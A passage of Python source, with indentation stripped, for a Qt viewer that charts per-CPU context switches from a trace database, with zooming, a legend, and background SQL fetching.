self.yrangelo = None
self.yrangehi = None
self.dp = XY(0, 0)
def AddGraphData(self, data):
self.data.append(data)
def LookupHRegion(self, key):
if key in self.hregions:
return self.hregions[key]
return None
def AddHRegion(self, key, hregion):
self.hregions[key] = hregion
# Switch graph data collection (SwitchGraphData for each CPU)
class SwitchGraphDataCollection(GraphDataCollection):
def __init__(self, glb, db, machine_id):
super(SwitchGraphDataCollection, self).__init__(glb)
self.machine_id = machine_id
self.cpus = self.SelectCPUs(db)
self.xrangelo = glb.StartTime(machine_id)
self.xrangehi = glb.FinishTime(machine_id)
self.yrangelo = Decimal(0)
self.yrangehi = Decimal(1000)
for cpu in self.cpus:
self.AddGraphData(SwitchGraphData(db, self, cpu, self.xrangelo))
def SelectCPUs(self, db):
cpus = []
query = QSqlQuery(db)
QueryExec(query, "SELECT DISTINCT cpu"
" FROM context_switches"
" WHERE machine_id = " + str(self.machine_id))
while query.next():
cpus.append(int(query.value(0)))
return sorted(cpus)
# Switch graph data graphics item displays the graphed data
class SwitchGraphDataGraphicsItem(QGraphicsItem):
def __init__(self, data, graph_width, graph_height, attrs, event_handler, parent=None):
super(SwitchGraphDataGraphicsItem, self).__init__(parent)
self.data = data
self.graph_width = graph_width
self.graph_height = graph_height
self.attrs = attrs
self.event_handler = event_handler
self.setAcceptHoverEvents(True)
def boundingRect(self):
return QRectF(0, 0, self.graph_width, self.graph_height)
def PaintPoint(self, painter, last, x):
if not(last is None or last.hregion.pid == 0 or x < self.attrs.subrange.x.lo):
if last.x < self.attrs.subrange.x.lo:
x0 = self.attrs.subrange.x.lo
else:
x0 = last.x
if x > self.attrs.subrange.x.hi:
x1 = self.attrs.subrange.x.hi
else:
x1 = x - 1
x0 = self.attrs.XToPixel(x0)
x1 = self.attrs.XToPixel(x1)
y0 = self.attrs.YToPixel(last.y)
colour = self.attrs.region_attributes[last.hregion.key].colour
width = x1 - x0 + 1
if width < 2:
painter.setPen(colour)
painter.drawLine(x0, self.graph_height - y0, x0, self.graph_height)
else:
painter.fillRect(x0, self.graph_height - y0, width, self.graph_height - 1, colour)
def paint(self, painter, option, widget):
last = None
for point in self.data.points:
self.PaintPoint(painter, last, point.x)
if point.x > self.attrs.subrange.x.hi:
break;
last = point
self.PaintPoint(painter, last, self.attrs.subrange.x.hi + 1)
def BinarySearchPoint(self, target):
lower_pos = 0
higher_pos = len(self.data.points)
while True:
pos = int((lower_pos + higher_pos) / 2)
val = self.data.points[pos].x
if target >= val:
lower_pos = pos
else:
higher_pos = pos
if higher_pos <= lower_pos + 1:
return lower_pos
def XPixelToData(self, x):
x = self.attrs.PixelToX(x)
if x < self.data.points[0].x:
x = 0
pos = 0
low = True
else:
pos = self.BinarySearchPoint(x)
low = False
return (low, pos, self.data.XToData(x))
def EventToData(self, event):
no_data = (None,) * 4
if len(self.data.points) < 1:
return no_data
x = event.pos().x()
if x < 0:
return no_data
low0, pos0, time_from = self.XPixelToData(x)
low1, pos1, time_to = self.XPixelToData(x + 1)
hregions = set()
hregion_times = []
if not low1:
for i in xrange(pos0, pos1 + 1):
hregion = self.data.points[i].hregion
hregions.add(hregion)
if i == pos0:
time = time_from
else:
time = self.data.XToData(self.data.points[i].x)
hregion_times.append((hregion, time))
return (time_from, time_to, hregions, hregion_times)
def hoverMoveEvent(self, event):
time_from, time_to, hregions, hregion_times = self.EventToData(event)
if time_from is not None:
self.event_handler.PointEvent(self.data.cpu, time_from, time_to, hregions)
def hoverLeaveEvent(self, event):
self.event_handler.NoPointEvent()
def mousePressEvent(self, event):
if event.button() != Qt.RightButton:
super(SwitchGraphDataGraphicsItem, self).mousePressEvent(event)
return
time_from, time_to, hregions, hregion_times = self.EventToData(event)
if hregion_times:
self.event_handler.RightClickEvent(self.data.cpu, hregion_times, event.screenPos())
# X-axis graphics item
class XAxisGraphicsItem(QGraphicsItem):
def __init__(self, width, parent=None):
super(XAxisGraphicsItem, self).__init__(parent)
self.width = width
self.max_mark_sz = 4
self.height = self.max_mark_sz + 1
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def Step(self):
attrs = self.parentItem().attrs
subrange = attrs.subrange.x
t = subrange.hi - subrange.lo
s = (3.0 * t) / self.width
n = 1.0
while s > n:
n = n * 10.0
return n
def PaintMarks(self, painter, at_y, lo, hi, step, i):
attrs = self.parentItem().attrs
x = lo
while x <= hi:
xp = attrs.XToPixel(x)
if i % 10:
if i % 5:
sz = 1
else:
sz = 2
else:
sz = self.max_mark_sz
i = 0
painter.drawLine(xp, at_y, xp, at_y + sz)
x += step
i += 1
def paint(self, painter, option, widget):
# Using QPainter::drawLine(int x1, int y1, int x2, int y2) so x2 = width -1
painter.drawLine(0, 0, self.width - 1, 0)
n = self.Step()
attrs = self.parentItem().attrs
subrange = attrs.subrange.x
if subrange.lo:
x_offset = n - (subrange.lo % n)
else:
x_offset = 0.0
x = subrange.lo + x_offset
i = (x / n) % 10
self.PaintMarks(painter, 0, x, subrange.hi, n, i)
def ScaleDimensions(self):
n = self.Step()
attrs = self.parentItem().attrs
lo = attrs.subrange.x.lo
hi = (n * 10.0) + lo
width = attrs.XToPixel(hi)
if width > 500:
width = 0
return (n, lo, hi, width)
def PaintScale(self, painter, at_x, at_y):
n, lo, hi, width = self.ScaleDimensions()
if not width:
return
painter.drawLine(at_x, at_y, at_x + width, at_y)
self.PaintMarks(painter, at_y, lo, hi, n, 0)
def ScaleWidth(self):
n, lo, hi, width = self.ScaleDimensions()
return width
def ScaleHeight(self):
return self.height
def ScaleUnit(self):
return self.Step() * 10
# Scale graphics item base class
class ScaleGraphicsItem(QGraphicsItem):
def __init__(self, axis, parent=None):
super(ScaleGraphicsItem, self).__init__(parent)
self.axis = axis
def boundingRect(self):
scale_width = self.axis.ScaleWidth()
if not scale_width:
return QRectF()
return QRectF(0, 0, self.axis.ScaleWidth() + 100, self.axis.ScaleHeight())
def paint(self, painter, option, widget):
scale_width = self.axis.ScaleWidth()
if not scale_width:
return
self.axis.PaintScale(painter, 0, 5)
x = scale_width + 4
painter.drawText(QPointF(x, 10), self.Text())
def Unit(self):
return self.axis.ScaleUnit()
def Text(self):
return ""
# Switch graph scale graphics item
class SwitchScaleGraphicsItem(ScaleGraphicsItem):
def __init__(self, axis, parent=None):
super(SwitchScaleGraphicsItem, self).__init__(axis, parent)
def Text(self):
unit = self.Unit()
if unit >= 1000000000:
unit = int(unit / 1000000000)
us = "s"
elif unit >= 1000000:
unit = int(unit / 1000000)
us = "ms"
elif unit >= 1000:
unit = int(unit / 1000)
us = "us"
else:
unit = int(unit)
us = "ns"
return " = " + str(unit) + " " + us
# Switch graph graphics item contains graph title, scale, x/y-axis, and the graphed data
class SwitchGraphGraphicsItem(QGraphicsItem):
def __init__(self, collection, data, attrs, event_handler, first, parent=None):
super(SwitchGraphGraphicsItem, self).__init__(parent)
self.collection = collection
self.data = data
self.attrs = attrs
self.event_handler = event_handler
margin = 20
title_width = 50
self.title_graphics = QGraphicsSimpleTextItem(data.title, self)
self.title_graphics.setPos(margin, margin)
graph_width = attrs.XToPixel(attrs.subrange.x.hi) + 1
graph_height = attrs.YToPixel(attrs.subrange.y.hi) + 1
self.graph_origin_x = margin + title_width + margin
self.graph_origin_y = graph_height + margin
x_axis_size = 1
y_axis_size = 1
self.yline = QGraphicsLineItem(0, 0, 0, graph_height, self)
self.x_axis = XAxisGraphicsItem(graph_width, self)
self.x_axis.setPos(self.graph_origin_x, self.graph_origin_y + 1)
if first:
self.scale_item = SwitchScaleGraphicsItem(self.x_axis, self)
self.scale_item.setPos(self.graph_origin_x, self.graph_origin_y + 10)
self.yline.setPos(self.graph_origin_x - y_axis_size, self.graph_origin_y - graph_height)
self.axis_point = QGraphicsLineItem(0, 0, 0, 0, self)
self.axis_point.setPos(self.graph_origin_x - 1, self.graph_origin_y +1)
self.width = self.graph_origin_x + graph_width + margin
self.height = self.graph_origin_y + margin
self.graph = SwitchGraphDataGraphicsItem(data, graph_width, graph_height, attrs, event_handler, self)
self.graph.setPos(self.graph_origin_x, self.graph_origin_y - graph_height)
if parent and 'EnableRubberBand' in dir(parent):
parent.EnableRubberBand(self.graph_origin_x, self.graph_origin_x + graph_width - 1, self)
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
pass
def RBXToPixel(self, x):
return self.attrs.PixelToX(x - self.graph_origin_x)
def RBXRangeToPixel(self, x0, x1):
return (self.RBXToPixel(x0), self.RBXToPixel(x1 + 1))
def RBPixelToTime(self, x):
if x < self.data.points[0].x:
return self.data.XToData(0)
return self.data.XToData(x)
def RBEventTimes(self, x0, x1):
x0, x1 = self.RBXRangeToPixel(x0, x1)
time_from = self.RBPixelToTime(x0)
time_to = self.RBPixelToTime(x1)
return (time_from, time_to)
def RBEvent(self, x0, x1):
time_from, time_to = self.RBEventTimes(x0, x1)
self.event_handler.RangeEvent(time_from, time_to)
def RBMoveEvent(self, x0, x1):
if x1 < x0:
x0, x1 = x1, x0
self.RBEvent(x0, x1)
def RBReleaseEvent(self, x0, x1, selection_state):
if x1 < x0:
x0, x1 = x1, x0
x0, x1 = self.RBXRangeToPixel(x0, x1)
self.event_handler.SelectEvent(x0, x1, selection_state)
# Graphics item to draw a vertical bracket (used to highlight "forward" sub-range)
class VerticalBracketGraphicsItem(QGraphicsItem):
def __init__(self, parent=None):
super(VerticalBracketGraphicsItem, self).__init__(parent)
self.width = 0
self.height = 0
self.hide()
def SetSize(self, width, height):
self.width = width + 1
self.height = height + 1
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
colour = QColor(255, 255, 0, 32)
painter.fillRect(0, 0, self.width, self.height, colour)
x1 = self.width - 1
y1 = self.height - 1
painter.drawLine(0, 0, x1, 0)
painter.drawLine(0, 0, 0, 3)
painter.drawLine(x1, 0, x1, 3)
painter.drawLine(0, y1, x1, y1)
painter.drawLine(0, y1, 0, y1 - 3)
painter.drawLine(x1, y1, x1, y1 - 3)
# Graphics item to contain graphs arranged vertically
class VertcalGraphSetGraphicsItem(QGraphicsItem):
def __init__(self, collection, attrs, event_handler, child_class, parent=None):
super(VertcalGraphSetGraphicsItem, self).__init__(parent)
self.collection = collection
self.top = 10
self.width = 0
self.height = self.top
self.rubber_band = None
self.rb_enabled = False
first = True
for data in collection.data:
child = child_class(collection, data, attrs, event_handler, first, self)
child.setPos(0, self.height + 1)
rect = child.boundingRect()
if rect.right() > self.width:
self.width = rect.right()
self.height = self.height + rect.bottom() + 1
first = False
self.bracket = VerticalBracketGraphicsItem(self)
def EnableRubberBand(self, xlo, xhi, rb_event_handler):
if self.rb_enabled:
return
self.rb_enabled = True
self.rb_in_view = False
self.setAcceptedMouseButtons(Qt.LeftButton)
self.rb_xlo = xlo
self.rb_xhi = xhi
self.rb_event_handler = rb_event_handler
self.mousePressEvent = self.MousePressEvent
self.mouseMoveEvent = self.MouseMoveEvent
self.mouseReleaseEvent = self.MouseReleaseEvent
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
pass
def RubberBandParent(self):
scene = self.scene()
view = scene.views()[0]
viewport = view.viewport()
return viewport
def RubberBandSetGeometry(self, rect):
scene_rectf = self.mapRectToScene(QRectF(rect))
scene = self.scene()
view = scene.views()[0]
poly = view.mapFromScene(scene_rectf)
self.rubber_band.setGeometry(poly.boundingRect())
def SetSelection(self, selection_state):
if self.rubber_band:
if selection_state:
self.RubberBandSetGeometry(selection_state)
self.rubber_band.show()
else:
self.rubber_band.hide()
def SetBracket(self, rect):
if rect:
x, y, width, height = rect.x(), rect.y(), rect.width(), rect.height()
self.bracket.setPos(x, y)
self.bracket.SetSize(width, height)
self.bracket.show()
else:
self.bracket.hide()
def RubberBandX(self, event):
x = event.pos().toPoint().x()
if x < self.rb_xlo:
x = self.rb_xlo
elif x > self.rb_xhi:
x = self.rb_xhi
else:
self.rb_in_view = True
return x
def RubberBandRect(self, x):
if self.rb_origin.x() <= x:
width = x - self.rb_origin.x()
rect = QRect(self.rb_origin, QSize(width, self.height))
else:
width = self.rb_origin.x() - x
top_left = QPoint(self.rb_origin.x() - width, self.rb_origin.y())
rect = QRect(top_left, QSize(width, self.height))
return rect
def MousePressEvent(self, event):
self.rb_in_view = False
x = self.RubberBandX(event)
self.rb_origin = QPoint(x, self.top)
if self.rubber_band is None:
self.rubber_band = QRubberBand(QRubberBand.Rectangle, self.RubberBandParent())
self.RubberBandSetGeometry(QRect(self.rb_origin, QSize(0, self.height)))
if self.rb_in_view:
self.rubber_band.show()
self.rb_event_handler.RBMoveEvent(x, x)
else:
self.rubber_band.hide()
def MouseMoveEvent(self, event):
x = self.RubberBandX(event)
rect = self.RubberBandRect(x)
self.RubberBandSetGeometry(rect)
if self.rb_in_view:
self.rubber_band.show()
self.rb_event_handler.RBMoveEvent(self.rb_origin.x(), x)
def MouseReleaseEvent(self, event):
x = self.RubberBandX(event)
if self.rb_in_view:
selection_state = self.RubberBandRect(x)
else:
selection_state = None
self.rb_event_handler.RBReleaseEvent(self.rb_origin.x(), x, selection_state)
# Switch graph legend data model
class SwitchGraphLegendModel(QAbstractTableModel):
def __init__(self, collection, region_attributes, parent=None):
super(SwitchGraphLegendModel, self).__init__(parent)
self.region_attributes = region_attributes
self.child_items = sorted(collection.hregions.values(), key=GraphDataRegionOrdinal)
self.child_count = len(self.child_items)
self.highlight_set = set()
self.column_headers = ("pid", "tid", "comm")
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def data(self, index, role):
if role == Qt.BackgroundRole:
child = self.child_items[index.row()]
if child in self.highlight_set:
return self.region_attributes[child.key].colour
return None
if role == Qt.ForegroundRole:
child = self.child_items[index.row()]
if child in self.highlight_set:
return QColor(255, 255, 255)
return self.region_attributes[child.key].colour
if role != Qt.DisplayRole:
return None
hregion = self.child_items[index.row()]
col = index.column()
if col == 0:
return hregion.pid
if col == 1:
return hregion.tid
if col == 2:
return hregion.comm
return None
def SetHighlight(self, row, set_highlight):
child = self.child_items[row]
top_left = self.createIndex(row, 0, child)
bottom_right = self.createIndex(row, len(self.column_headers) - 1, child)
self.dataChanged.emit(top_left, bottom_right)
def Highlight(self, highlight_set):
for row in xrange(self.child_count):
child = self.child_items[row]
if child in self.highlight_set:
if child not in highlight_set:
self.SetHighlight(row, False)
elif child in highlight_set:
self.SetHighlight(row, True)
self.highlight_set = highlight_set
# Switch graph legend is a table
class SwitchGraphLegend(QWidget):
def __init__(self, collection, region_attributes, parent=None):
super(SwitchGraphLegend, self).__init__(parent)
self.data_model = SwitchGraphLegendModel(collection, region_attributes)
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.resizeColumnsToContents()
self.view.resizeRowsToContents()
self.vbox = VBoxLayout(self.view)
self.setLayout(self.vbox)
sz1 = self.view.columnWidth(0) + self.view.columnWidth(1) + self.view.columnWidth(2) + 2
sz1 = sz1 + self.view.verticalScrollBar().sizeHint().width()
self.saved_size = sz1
def resizeEvent(self, event):
self.saved_size = self.size().width()
super(SwitchGraphLegend, self).resizeEvent(event)
def Highlight(self, highlight_set):
self.data_model.Highlight(highlight_set)
self.update()
def changeEvent(self, event):
if event.type() == QEvent.FontChange:
self.view.resizeRowsToContents()
self.view.resizeColumnsToContents()
# Need to resize rows again after column resize
self.view.resizeRowsToContents()
super(SwitchGraphLegend, self).changeEvent(event)
# Random colour generation
def RGBColourTooLight(r, g, b):
if g > 230:
return True
if g <= 160:
return False
if r <= 180 and g <= 180:
return False
if r < 60:
return False
return True
def GenerateColours(x):
cs = [0]
for i in xrange(1, x):
cs.append(int((255.0 / i) + 0.5))
colours = []
for r in cs:
for g in cs:
for b in cs:
# Exclude black and colours that look too light against a white background
if (r, g, b) == (0, 0, 0) or RGBColourTooLight(r, g, b):
continue
colours.append(QColor(r, g, b))
return colours
def GenerateNColours(n):
for x in xrange(2, n + 2):
colours = GenerateColours(x)
if len(colours) >= n:
return colours
return []
def GenerateNRandomColours(n, seed):
colours = GenerateNColours(n)
random.seed(seed)
random.shuffle(colours)
return colours
# Graph attributes, in particular the scale and subrange that change when zooming
class GraphAttributes():
def __init__(self, scale, subrange, region_attributes, dp):
self.scale = scale
self.subrange = subrange
self.region_attributes = region_attributes
# Rounding avoids errors due to finite floating point precision
self.dp = dp # data decimal places
self.Update()
def XToPixel(self, x):
return int(round((x - self.subrange.x.lo) * self.scale.x, self.pdp.x))
def YToPixel(self, y):
return int(round((y - self.subrange.y.lo) * self.scale.y, self.pdp.y))
def PixelToXRounded(self, px):
return round((round(px, 0) / self.scale.x), self.dp.x) + self.subrange.x.lo
def PixelToYRounded(self, py):
return round((round(py, 0) / self.scale.y), self.dp.y) + self.subrange.y.lo
def PixelToX(self, px):
x = self.PixelToXRounded(px)
if self.pdp.x == 0:
rt = self.XToPixel(x)
if rt > px:
return x - 1
return x
def PixelToY(self, py):
y = self.PixelToYRounded(py)
if self.pdp.y == 0:
rt = self.YToPixel(y)
if rt > py:
return y - 1
return y
def ToPDP(self, dp, scale):
# Calculate pixel decimal places:
# (10 ** dp) is the minimum delta in the data
# scale it to get the minimum delta in pixels
# log10 gives the number of decimals places negatively
# subtrace 1 to divide by 10
# round to the lower negative number
# change the sign to get the number of decimals positively
x = math.log10((10 ** dp) * scale)
if x < 0:
x -= 1
x = -int(math.floor(x) - 0.1)
else:
x = 0
return x
def Update(self):
x = self.ToPDP(self.dp.x, self.scale.x)
y = self.ToPDP(self.dp.y, self.scale.y)
self.pdp = XY(x, y) # pixel decimal places
# Switch graph splitter which divides the CPU graphs from the legend
class SwitchGraphSplitter(QSplitter):
def __init__(self, parent=None):
super(SwitchGraphSplitter, self).__init__(parent)
self.first_time = False
def resizeEvent(self, ev):
if self.first_time:
self.first_time = False
sz1 = self.widget(1).view.columnWidth(0) + self.widget(1).view.columnWidth(1) + self.widget(1).view.columnWidth(2) + 2
sz1 = sz1 + self.widget(1).view.verticalScrollBar().sizeHint().width()
sz0 = self.size().width() - self.handleWidth() - sz1
self.setSizes([sz0, sz1])
elif not(self.widget(1).saved_size is None):
sz1 = self.widget(1).saved_size
sz0 = self.size().width() - self.handleWidth() - sz1
self.setSizes([sz0, sz1])
super(SwitchGraphSplitter, self).resizeEvent(ev)
# Graph widget base class
class GraphWidget(QWidget):
graph_title_changed = Signal(object)
def __init__(self, parent=None):
super(GraphWidget, self).__init__(parent)
def GraphTitleChanged(self, title):
self.graph_title_changed.emit(title)
def Title(self):
return ""
# Display time in s, ms, us or ns
def ToTimeStr(val):
val = Decimal(val)
if val >= 1000000000:
return "{} s".format((val / 1000000000).quantize(Decimal("0.000000001")))
if val >= 1000000:
return "{} ms".format((val / 1000000).quantize(Decimal("0.000001")))
if val >= 1000:
return "{} us".format((val / 1000).quantize(Decimal("0.001")))
return "{} ns".format(val.quantize(Decimal("1")))
# Switch (i.e. context switch i.e. Time Chart by CPU) graph widget which contains the CPU graphs and the legend and control buttons
class SwitchGraphWidget(GraphWidget):
def __init__(self, glb, collection, parent=None):
super(SwitchGraphWidget, self).__init__(parent)
self.glb = glb
self.collection = collection
self.back_state = []
self.forward_state = []
self.selection_state = (None, None)
self.fwd_rect = None
self.start_time = self.glb.StartTime(collection.machine_id)
i = 0
hregions = collection.hregions.values()
colours = GenerateNRandomColours(len(hregions), 1013)
region_attributes = {}
for hregion in hregions:
if hregion.pid == 0 and hregion.tid == 0:
region_attributes[hregion.key] = GraphRegionAttribute(QColor(0, 0, 0))
else:
region_attributes[hregion.key] = GraphRegionAttribute(colours[i])
i = i + 1
# Default to entire range
xsubrange = Subrange(0.0, float(collection.xrangehi - collection.xrangelo) + 1.0)
ysubrange = Subrange(0.0, float(collection.yrangehi - collection.yrangelo) + 1.0)
subrange = XY(xsubrange, ysubrange)
scale = self.GetScaleForRange(subrange)
self.attrs = GraphAttributes(scale, subrange, region_attributes, collection.dp)
self.item = VertcalGraphSetGraphicsItem(collection, self.attrs, self, SwitchGraphGraphicsItem)
self.scene = QGraphicsScene()
self.scene.addItem(self.item)
self.view = QGraphicsView(self.scene)
self.view.centerOn(0, 0)
self.view.setAlignment(Qt.AlignLeft | Qt.AlignTop)
self.legend = SwitchGraphLegend(collection, region_attributes)
self.splitter = SwitchGraphSplitter()
self.splitter.addWidget(self.view)
self.splitter.addWidget(self.legend)
self.point_label = QLabel("")
self.point_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Fixed)
self.back_button = QToolButton()
self.back_button.setIcon(self.style().standardIcon(QStyle.SP_ArrowLeft))
self.back_button.setDisabled(True)
self.back_button.released.connect(lambda: self.Back())
self.forward_button = QToolButton()
self.forward_button.setIcon(self.style().standardIcon(QStyle.SP_ArrowRight))
self.forward_button.setDisabled(True)
self.forward_button.released.connect(lambda: self.Forward())
self.zoom_button = QToolButton()
self.zoom_button.setText("Zoom")
self.zoom_button.setDisabled(True)
self.zoom_button.released.connect(lambda: self.Zoom())
self.hbox = HBoxLayout(self.back_button, self.forward_button, self.zoom_button, self.point_label)
self.vbox = VBoxLayout(self.splitter, self.hbox)
self.setLayout(self.vbox)
def GetScaleForRangeX(self, xsubrange):
# Default graph 1000 pixels wide
dflt = 1000.0
r = xsubrange.hi - xsubrange.lo
return dflt / r
def GetScaleForRangeY(self, ysubrange):
# Default graph 50 pixels high
dflt = 50.0
r = ysubrange.hi - ysubrange.lo
return dflt / r
def GetScaleForRange(self, subrange):
# Default graph 1000 pixels wide, 50 pixels high
xscale = self.GetScaleForRangeX(subrange.x)
yscale = self.GetScaleForRangeY(subrange.y)
return XY(xscale, yscale)
def PointEvent(self, cpu, time_from, time_to, hregions):
text = "CPU: " + str(cpu)
time_from = time_from.quantize(Decimal(1))
rel_time_from = time_from - self.glb.StartTime(self.collection.machine_id)
text = text + " Time: " + str(time_from) + " (+" + ToTimeStr(rel_time_from) + ")"
self.point_label.setText(text)
self.legend.Highlight(hregions)
def RightClickEvent(self, cpu, hregion_times, pos):
if not IsSelectable(self.glb.db, "calls", "WHERE parent_id >= 0"):
return
menu = QMenu(self.view)
for hregion, time in hregion_times:
thread_at_time = (hregion.exec_comm_id, hregion.thread_id, time)
menu_text = "Show Call Tree for {} {}:{} at {}".format(hregion.comm, hregion.pid, hregion.tid, time)
menu.addAction(CreateAction(menu_text, "Show Call Tree", lambda a=None, args=thread_at_time: self.RightClickSelect(args), self.view))
menu.exec_(pos)
def RightClickSelect(self, args):
CallTreeWindow(self.glb, self.glb.mainwindow, thread_at_time=args)
def NoPointEvent(self):
self.point_label.setText("")
self.legend.Highlight({})
def RangeEvent(self, time_from, time_to):
time_from = time_from.quantize(Decimal(1))
time_to = time_to.quantize(Decimal(1))
if time_to <= time_from:
self.point_label.setText("")
return
rel_time_from = time_from - self.start_time
rel_time_to = time_to - self.start_time
text = " Time: " + str(time_from) + " (+" + ToTimeStr(rel_time_from) + ") to: " + str(time_to) + " (+" + ToTimeStr(rel_time_to) + ")"
text = text + " duration: " + ToTimeStr(time_to - time_from)
self.point_label.setText(text)
def BackState(self):
return (self.attrs.subrange, self.attrs.scale, self.selection_state, self.fwd_rect)
def PushBackState(self):
state = copy.deepcopy(self.BackState())
self.back_state.append(state)
self.back_button.setEnabled(True)
def PopBackState(self):
self.attrs.subrange, self.attrs.scale, self.selection_state, self.fwd_rect = self.back_state.pop()
self.attrs.Update()
if not self.back_state:
self.back_button.setDisabled(True)
def PushForwardState(self):
state = copy.deepcopy(self.BackState())
self.forward_state.append(state)
self.forward_button.setEnabled(True)
def PopForwardState(self):
self.attrs.subrange, self.attrs.scale, self.selection_state, self.fwd_rect = self.forward_state.pop()
self.attrs.Update()
if not self.forward_state:
self.forward_button.setDisabled(True)
def Title(self):
time_from = self.collection.xrangelo + Decimal(self.attrs.subrange.x.lo)
time_to = self.collection.xrangelo + Decimal(self.attrs.subrange.x.hi)
rel_time_from = time_from - self.start_time
rel_time_to = time_to - self.start_time
title = "+" + ToTimeStr(rel_time_from) + " to +" + ToTimeStr(rel_time_to)
title = title + " (" + ToTimeStr(time_to - time_from) + ")"
return title
def Update(self):
selected_subrange, selection_state = self.selection_state
self.item.SetSelection(selection_state)
self.item.SetBracket(self.fwd_rect)
self.zoom_button.setDisabled(selected_subrange is None)
self.GraphTitleChanged(self.Title())
self.item.update(self.item.boundingRect())
def Back(self):
if not self.back_state:
return
self.PushForwardState()
self.PopBackState()
self.Update()
def Forward(self):
if not self.forward_state:
return
self.PushBackState()
self.PopForwardState()
self.Update()
def SelectEvent(self, x0, x1, selection_state):
if selection_state is None:
selected_subrange = None
else:
if x1 - x0 < 1.0:
x1 += 1.0
selected_subrange = Subrange(x0, x1)
self.selection_state = (selected_subrange, selection_state)
self.zoom_button.setDisabled(selected_subrange is None)
def Zoom(self):
selected_subrange, selection_state = self.selection_state
if selected_subrange is None:
return
self.fwd_rect = selection_state
self.item.SetSelection(None)
self.PushBackState()
self.attrs.subrange.x = selected_subrange
self.forward_state = []
self.forward_button.setDisabled(True)
self.selection_state = (None, None)
self.fwd_rect = None
self.attrs.scale.x = self.GetScaleForRangeX(self.attrs.subrange.x)
self.attrs.Update()
self.Update()
# Slow initialization - perform non-GUI initialization in a separate thread and put up a modal message box while waiting
class SlowInitClass():
def __init__(self, glb, title, init_fn):
self.init_fn = init_fn
self.done = False
self.result = None
self.msg_box = QMessageBox(glb.mainwindow)
self.msg_box.setText("Initializing " + title + ". Please wait.")
self.msg_box.setWindowTitle("Initializing " + title)
self.msg_box.setWindowIcon(glb.mainwindow.style().standardIcon(QStyle.SP_MessageBoxInformation))
self.init_thread = Thread(self.ThreadFn, glb)
self.init_thread.done.connect(lambda: self.Done(), Qt.QueuedConnection)
self.init_thread.start()
def Done(self):
self.msg_box.done(0)
def ThreadFn(self, glb):
conn_name = "SlowInitClass" + str(os.getpid())
db, dbname = glb.dbref.Open(conn_name)
self.result = self.init_fn(db)
self.done = True
return (True, 0)
def Result(self):
while not self.done:
self.msg_box.exec_()
self.init_thread.wait()
return self.result
def SlowInit(glb, title, init_fn):
init = SlowInitClass(glb, title, init_fn)
return init.Result()
# Time chart by CPU window
class TimeChartByCPUWindow(QMdiSubWindow):
def __init__(self, glb, parent=None):
super(TimeChartByCPUWindow, self).__init__(parent)
self.glb = glb
self.machine_id = glb.HostMachineId()
self.collection_name = "SwitchGraphDataCollection " + str(self.machine_id)
collection = LookupModel(self.collection_name)
if collection is None:
collection = SlowInit(glb, "Time Chart", self.Init)
self.widget = SwitchGraphWidget(glb, collection, self)
self.view = self.widget
self.base_title = "Time Chart by CPU"
self.setWindowTitle(self.base_title + self.widget.Title())
self.widget.graph_title_changed.connect(self.GraphTitleChanged)
self.setWidget(self.widget)
AddSubWindow(glb.mainwindow.mdi_area, self, self.windowTitle())
def Init(self, db):
return LookupCreateModel(self.collection_name, lambda : SwitchGraphDataCollection(self.glb, db, self.machine_id))
def GraphTitleChanged(self, title):
self.setWindowTitle(self.base_title + " : " + title)
# Child data item finder
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction,pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Background process for SQL data fetcher
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
def WaitForTarget(self):
